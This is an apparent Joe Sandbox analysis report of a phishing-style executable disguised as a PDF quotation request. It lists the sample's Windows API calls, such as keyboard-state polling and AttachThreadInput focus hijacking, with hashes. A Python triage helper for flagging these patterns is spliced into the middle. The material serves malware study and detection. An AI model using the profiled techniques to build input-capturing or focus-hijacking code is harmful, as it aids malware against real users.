  • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
• DestroyAcceleratorTable.USER32(?), ref: 0047094A
• ImageList_Destroy.COMCTL32(?), ref: 004709AD
• ImageList_Destroy.COMCTL32(?), ref: 004709C5
• ImageList_Destroy.COMCTL32(?), ref: 004709D5
• DeleteObject.GDI32(004E0000), ref: 00470A04
• DestroyIcon.USER32(00440054), ref: 00470A1C
• DeleteObject.GDI32(675294A6), ref: 00470A34
• DestroyWindow.USER32(005C003A), ref: 00470A4C
• DestroyIcon.USER32(?), ref: 00470A73
• DestroyIcon.USER32(?), ref: 00470A81
• KillTimer.USER32(00000000,00000000), ref: 00470B00
Memory Dump Source
• Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
Similarity
• API ID: Destroy$IconImageList_$DeleteObject$AcceleratorInvalidateKillRectTableTimerWindow
• String ID:
• API String ID: 1237572874-0
• Opcode ID: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
• Instruction ID: 3938066daea6daae9dc0c39577387909b3bcb8112bd91d3310d64c2ecda3814a
• Opcode Fuzzy Hash: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
• Instruction Fuzzy Hash: 24616874601201CFE714DF65DD94FAA77B8FB6A304B54856EE6098B3A2CB38EC41CB58
APIs
• SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,004795FD), ref: 00479380
• SafeArrayAllocData.OLEAUT32(004795FD), ref: 004793CF
• VariantInit.OLEAUT32(?), ref: 004793E1
• SafeArrayAccessData.OLEAUT32(004795FD,?), ref: 00479402
• VariantCopy.OLEAUT32(?,?), ref: 00479461
• SafeArrayUnaccessData.OLEAUT32(004795FD), ref: 00479474
• VariantClear.OLEAUT32(?), ref: 00479489
• SafeArrayDestroyData.OLEAUT32(004795FD), ref: 004794AE
• SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794B8
• VariantClear.OLEAUT32(?), ref: 004794CA
• SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794E7
Memory Dump Source
• Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
Similarity
• API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
• String ID:
• API String ID: 2706829360-0
• Opcode ID: 23f20de2412018a08f4578d4e0f12eac70a18aacfa0f9406534bc12fd33cd3b0
• Instruction ID: 8c269571b42c1441f814514f03b92edd351012a73d8239c9f379a0a89e1b4ae1
• Opcode Fuzzy Hash: 23f20de2412018a08f4578d4e0f12eac70a18aacfa0f9406534bc12fd33cd3b0
• Instruction Fuzzy Hash: F6515E76A00119ABCB00DFA5DD849DEB7B9FF88704F10856EE905A7241DB749E06CBA4
APIs
• GetKeyboardState.USER32(?), ref: 0044480E
• GetAsyncKeyState.USER32(000000A0), ref: 00444899
• GetKeyState.USER32(000000A0), ref: 004448AA
• GetAsyncKeyState.USER32(000000A1), ref: 004448C8
• GetKeyState.USER32(000000A1), ref: 004448D9
• GetAsyncKeyState.USER32(00000011), ref: 004448F5
• GetKeyState.USER32(00000011), ref: 00444903
• GetAsyncKeyState.USER32(00000012), ref: 0044491F
• GetKeyState.USER32(00000012), ref: 0044492D
• GetAsyncKeyState.USER32(0000005B), ref: 00444949
• GetKeyState.USER32(0000005B), ref: 00444958
Memory Dump Source
• Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
Similarity
• API ID: State$Async$Keyboard
• String ID:
• API String ID: 541375521-0
• Opcode ID: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
• Instruction ID: 827c2ee343902556a703916e37c968ecd50c133e95067caf6822082f003788d3
• Opcode Fuzzy Hash: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
• Instruction Fuzzy Hash: 27412B34A047C969FF31A6A4C8043A7BBA16FA1314F04805FD5C5477C1DBED99C8C7A9
APIs
Memory Dump Source
• Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: InitVariant$_malloc_wcscpy_wcslen
                                                                    • String ID:
                                                                    • API String ID: 3413494760-0
                                                                    • Opcode ID: f5e40c8b900fee1b1836114e96baa7676a5d0ea0456728bbb6ba58b9775705ba
                                                                    • Instruction ID: 93a03e1dde4748921c3f7e50244c45dc9774a8ad470eaa8d68eb3f4e8808ad8d
                                                                    • Opcode Fuzzy Hash: f5e40c8b900fee1b1836114e96baa7676a5d0ea0456728bbb6ba58b9775705ba
                                                                    • Instruction Fuzzy Hash: 33414BB260070AAFC754DF69C880A86BBE8FF48314F00862AE619C7750D775E564CBE5
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProc_free_malloc$_strcat_strlen
                                                                    • String ID: AU3_FreeVar
                                                                    • API String ID: 2634073740-771828931
                                                                    • Opcode ID: 7469b796c24323d6f3eda0c3f5c0d0c50cf0738e1869aab7cbc683baa6804d19
                                                                    • Instruction ID: 8d08e60933d1045585c44e473594da8d0bbfd8a8652ecee4fcef853dc29158a1
                                                                    • Opcode Fuzzy Hash: 7469b796c24323d6f3eda0c3f5c0d0c50cf0738e1869aab7cbc683baa6804d19
                                                                    • Instruction Fuzzy Hash: 00B1ADB4A00206DFCB00DF55C880A6AB7A5FF88319F2485AEED058F352D739ED95CB94
                                                                    APIs
                                                                    • CoInitialize.OLE32 ref: 0046C63A
                                                                    • CoUninitialize.OLE32 ref: 0046C645
                                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                      • Part of subcall function 0044CB87: CreateDispTypeInfo.OLEAUT32(?,00000800,?), ref: 0044CBD4
                                                                      • Part of subcall function 0044CB87: CreateStdDispatch.OLEAUT32(00000000,?,?,?), ref: 0044CBF4
                                                                    • CLSIDFromProgID.OLE32(00000000,?), ref: 0046C694
                                                                    • CLSIDFromString.OLE32(00000000,?), ref: 0046C6A4
                                                                    • CoCreateInstance.OLE32(?,00000000,00000017,00482998,?), ref: 0046C6CD
                                                                    • IIDFromString.OLE32(?,?), ref: 0046C705
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: CreateFrom$String$DispDispatchInfoInitializeInstanceProgTypeUninitialize_malloc
                                                                    • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                    • API String ID: 2294789929-1287834457
                                                                    • Opcode ID: 0c20d40775bfce32cf04661d64601a772ae0601135a746145f676a0c56776114
                                                                    • Instruction ID: adb6a6f601bf1a612e569d1fac1689f55b30b767fcafa950e0578031a668eb85
                                                                    • Opcode Fuzzy Hash: 0c20d40775bfce32cf04661d64601a772ae0601135a746145f676a0c56776114
                                                                    • Instruction Fuzzy Hash: B861BC712043019FD710EF21D885B7BB3E8FB84715F10891EF9859B241E779E909CBAA
                                                                    APIs
                                                                      • Part of subcall function 00456391: GetCursorPos.USER32(?), ref: 004563A6
                                                                      • Part of subcall function 00456391: ScreenToClient.USER32(?,?), ref: 004563C3
                                                                      • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456400
                                                                      • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456410
                                                                    • DefDlgProcW.USER32(?,00000205,?,?), ref: 00471145
                                                                    • ImageList_DragLeave.COMCTL32(00000000), ref: 00471163
                                                                    • ImageList_EndDrag.COMCTL32 ref: 00471169
                                                                    • ReleaseCapture.USER32 ref: 0047116F
                                                                    • SetWindowTextW.USER32(?,00000000), ref: 00471206
                                                                    • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00471216
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: AsyncDragImageList_State$CaptureClientCursorLeaveMessageProcReleaseScreenSendTextWindow
                                                                    • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                    • API String ID: 2483343779-2107944366
                                                                    • Opcode ID: 862218e56057e4c31be0f3cfe2a72976207c2cce32986d51b358be60c196e1fc
                                                                    • Instruction ID: f70d9246110d4513cc5ea0640624bfdb04bec8758509bedf4130776013c57ff9
                                                                    • Opcode Fuzzy Hash: 862218e56057e4c31be0f3cfe2a72976207c2cce32986d51b358be60c196e1fc
                                                                    • Instruction Fuzzy Hash: D751E5706002109FD700EF59CC85BAF77A5FB89310F004A6EF945A72E2DB789D45CBAA
                                                                    APIs
                                                                    • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004506A0
                                                                    • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 004506B4
                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004506D5
                                                                    • _wcslen.LIBCMT ref: 00450720
                                                                    • _wcscat.LIBCMT ref: 00450733
                                                                    • SendMessageW.USER32(?,00001057,00000000,?), ref: 0045074C
                                                                    • SendMessageW.USER32(?,00001061,?,?), ref: 0045077E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Window_wcscat_wcslen
                                                                    • String ID: -----$SysListView32
                                                                    • API String ID: 4008455318-3975388722
                                                                    • Opcode ID: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                                                                    • Instruction ID: d83f74bd31ff7b91e94eebeff09b40632409ca0fd113a8de7250d6f1aa6a1b31
                                                                    • Opcode Fuzzy Hash: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                                                                    • Instruction Fuzzy Hash: 9C51D470500308ABDB24CF64CD89FEE77A5EF98304F10065EF944A72C2D3B99959CB58
                                                                    APIs
                                                                      • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                      • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                    • SendMessageW.USER32(00000000,0000018C,000000FF,00000000), ref: 00469C73
                                                                    • GetDlgCtrlID.USER32(00000000), ref: 00469C84
                                                                    • GetParent.USER32 ref: 00469C98
                                                                    • SendMessageW.USER32(00000000,?,00000111), ref: 00469C9F
                                                                    • GetDlgCtrlID.USER32(00000000), ref: 00469CA5
                                                                    • GetParent.USER32 ref: 00469CBC
                                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 00469CC3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$CtrlParent$_memmove_wcslen
                                                                    • String ID: ComboBox$ListBox
                                                                    • API String ID: 2360848162-1403004172
                                                                    • Opcode ID: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                                                                    • Instruction ID: b77daa4920d68b7dc7b38413de7e2b04daab878370679d8231203fb1b5b646ea
                                                                    • Opcode Fuzzy Hash: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                                                                    • Instruction Fuzzy Hash: 0121E7716001187BDB00AB69CC85ABF779CEB85320F00855BFA149B2D1D6B8D845C7A5
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: _wcscpy$FolderUninitialize$BrowseDesktopFromInitializeListMallocPath
                                                                    • String ID:
                                                                    • API String ID: 262282135-0
                                                                    • Opcode ID: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                                                                    • Instruction ID: f209a7e015878e5ef66622a864ec89938c936514b9877fb167e893f071c19078
                                                                    • Opcode Fuzzy Hash: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                                                                    • Instruction Fuzzy Hash: 25718275900208AFCB14EF95C9849DEB7B9EF88304F00899AE9099B312D735EE45CF64
                                                                    APIs
                                                                    • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 004481A8
                                                                    • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 004481AB
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 004481CF
                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004481F2
                                                                    • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00448266
                                                                    • SendMessageW.USER32(?,00001074,?,00000007), ref: 004482B4
                                                                    • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004482CF
                                                                    • SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 004482F1
                                                                    • SendMessageW.USER32(?,0000101E,00000001,?), ref: 00448308
                                                                    • SendMessageW.USER32(?,00001008,?,00000007), ref: 00448320
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$LongWindow
                                                                    • String ID:
                                                                    • API String ID: 312131281-0
                                                                    • Opcode ID: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                                                    • Instruction ID: c7c5d5d6f9bf0949bb943eac7ac5a8ec30049dd2ce11923e35461b50cec8bdb0
                                                                    • Opcode Fuzzy Hash: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                                                    • Instruction Fuzzy Hash: 97617C70A00208AFEB10DF94DC81FEE77B9FF49714F10429AF914AB291DBB5AA41CB54
                                                                    APIs
                                                                    • GetCurrentThreadId.KERNEL32 ref: 00434643
                                                                    • GetForegroundWindow.USER32(00000000), ref: 00434655
                                                                    • GetWindowThreadProcessId.USER32(00000000), ref: 0043465C
                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434671
                                                                    • GetWindowThreadProcessId.USER32(?,?), ref: 0043467F
                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434698
                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004346A6
                                                                    • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004346F3
                                                                    • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434707
                                                                    • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434712
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                    • String ID:
                                                                    • API String ID: 2156557900-0
                                                                    • Opcode ID: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                                                    • Instruction ID: 33c2ceff45d8cb0672f592c0823183733d26e7ad7419b63083ab10cfbc882f35
                                                                    • Opcode Fuzzy Hash: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                                                    • Instruction Fuzzy Hash: 98313EB2600204BFDB11DF69DC859AEB7A9FB9A310F00552AF905D7250E778AD40CB6C
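The two function records above (the OLE32 CLSIDFromProgID / CoCreateInstance routine with the "Failed to create object" string, and the GetForegroundWindow / AttachThreadInput routine) are the kind of per-function API listing an analyst usually wants in structured form rather than as report text. The following Python is an added triage helper, not Joe Sandbox code and not part of the sample: it parses "APIs" records in the exact line shape printed in this report (direct calls and "Part of subcall function" lines), keeps the call addresses, and applies two heuristics whose names are my own choice. The sample input is constructed from those two records.

```python
import re

# Constructed sample, not copied verbatim from a single report record: two
# "APIs" records in the shape Joe Sandbox prints them (direct calls plus
# "Part of subcall function" lines), the first followed by its String ID line.
SAMPLE_REPORT = """\
APIs
• CoInitialize.OLE32 ref: 0046C63A
• CoUninitialize.OLE32 ref: 0046C645
  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
• CLSIDFromProgID.OLE32(00000000,?), ref: 0046C694
• CLSIDFromString.OLE32(00000000,?), ref: 0046C6A4
• CoCreateInstance.OLE32(?,00000000,00000017,00482998,?), ref: 0046C6CD
• IIDFromString.OLE32(?,?), ref: 0046C705
Strings
• String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
APIs
• GetCurrentThreadId.KERNEL32 ref: 00434643
• GetForegroundWindow.USER32(00000000), ref: 00434655
• GetWindowThreadProcessId.USER32(00000000), ref: 0043465C
• AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434671
• AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004346F3
Memory Dump Source
"""

# One "• Api.MODULE(args), ref: ADDR" line, with or without an argument list,
# optionally prefixed by "Part of subcall function ADDR:".
API_LINE = re.compile(
    r"^\s*[•*-]?\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)


def parse_api_records(text):
    """Return one dict per 'APIs' header: {'calls': [...], 'string_id': ...}.

    Each call is {'api', 'module', 'args', 'ref', 'subcall'}; 'subcall' is the
    callee address when the report marks the call as reached via a helper.
    """
    records, current = [], None
    for line in text.splitlines():
        stripped = line.strip()
        if stripped == "APIs":
            current = {"calls": [], "string_id": None}
            records.append(current)
            continue
        if current is None:
            continue
        m = API_LINE.match(line)
        if m:
            current["calls"].append({
                "api": m["api"],
                "module": m["mod"].upper(),
                "args": m["args"].split(",") if m["args"] else [],
                "ref": int(m["ref"], 16),
                "subcall": int(m["sub"], 16) if m["sub"] else None,
            })
        elif stripped.startswith("• String ID:"):
            current["string_id"] = stripped[len("• String ID:"):].strip() or None
    return records


# Triage heuristics chosen for this example (names are mine, not report
# signatures). Only direct calls count, so a function is flagged for what it
# does itself rather than for what a shared helper does.
PATTERNS = {
    # Attaching to the foreground window's input thread is the usual way to
    # force focus or feed input despite SetForegroundWindow restrictions.
    "focus_hijack": {"GetForegroundWindow", "AttachThreadInput"},
    # ProgID -> CLSID -> CoCreateInstance: the COM object is chosen at run
    # time (e.g. by an embedded script) rather than fixed at compile time.
    "runtime_com_create": {"CLSIDFromProgID", "CoCreateInstance"},
}


def flag_records(records):
    """Return (record_index, pattern_name, first_ref_hex) for each match."""
    hits = []
    for idx, rec in enumerate(records):
        direct = {c["api"] for c in rec["calls"] if c["subcall"] is None}
        for name, needed in PATTERNS.items():
            if needed <= direct:
                first = min(c["ref"] for c in rec["calls"] if c["api"] in needed)
                hits.append((idx, name, f"{first:08X}"))
    return hits


if __name__ == "__main__":
    recs = parse_api_records(SAMPLE_REPORT)
    for idx, name, ref in flag_records(recs):
        apis = ", ".join(sorted({c["api"] for c in recs[idx]["calls"]}))
        print(f"record {idx} @ {ref}: {name} [{apis}] strings={recs[idx]['string_id']!r}")
```

Feed it the "APIs" sections of a full report and the returned addresses (the `ref` of the first matching call) are what to jump to in the disassembly; the String ID kept on each record gives the error strings the routine reports, which is often the quickest way to tell runtime-library scaffolding from the payload's own code.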
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                    • API String ID: 0-1603158881
                                                                    APIs
                                                                    • CreateMenu.USER32 ref: 00448603
                                                                    • SetMenu.USER32(?,00000000), ref: 00448613
                                                                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448697
                                                                    • IsMenu.USER32(?), ref: 004486AB
                                                                    • CreatePopupMenu.USER32 ref: 004486B5
                                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004486EC
                                                                    • DrawMenuBar.USER32 ref: 004486F5
                                                                    Similarity
                                                                    • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                    • String ID: 0
                                                                    • API String ID: 161812096-4108050209
                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(00000000,004A90E8,?,00000100,?,C:\Users\user\Desktop\Quotation request -30112024_pdf.exe), ref: 00434057
                                                                    • LoadStringW.USER32(00000000), ref: 00434060
                                                                    • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00434075
                                                                    • LoadStringW.USER32(00000000), ref: 00434078
                                                                    • _wprintf.LIBCMT ref: 004340A1
                                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004340B9
                                                                    Strings
                                                                    • %s (%d) : ==> %s: %s %s, xrefs: 0043409C
                                                                    • C:\Users\user\Desktop\Quotation request -30112024_pdf.exe, xrefs: 00434040
                                                                    Similarity
                                                                    • API ID: HandleLoadModuleString$Message_wprintf
                                                                    • String ID: %s (%d) : ==> %s: %s %s$C:\Users\user\Desktop\Quotation request -30112024_pdf.exe
                                                                    • API String ID: 3648134473-947574551
                                                                    APIs
                                                                      • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\Quotation request -30112024_pdf.exe,0040F545,C:\Users\user\Desktop\Quotation request -30112024_pdf.exe,004A90E8,C:\Users\user\Desktop\Quotation request -30112024_pdf.exe,?,0040F545), ref: 0041013C
                                                                      • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                    • lstrcmpiW.KERNEL32(?,?), ref: 00453900
                                                                    • MoveFileW.KERNEL32(?,?), ref: 00453932
                                                                    Similarity
                                                                    • API ID: File$AttributesFullMoveNamePathlstrcmpi
                                                                    • String ID:
                                                                    • API String ID: 978794511-0
                                                                    Similarity
                                                                    • API ID: ClearVariant
                                                                    • String ID:
                                                                    • API String ID: 1473721057-0
                                                                    Similarity
                                                                    • API ID: _memmove$_memcmp
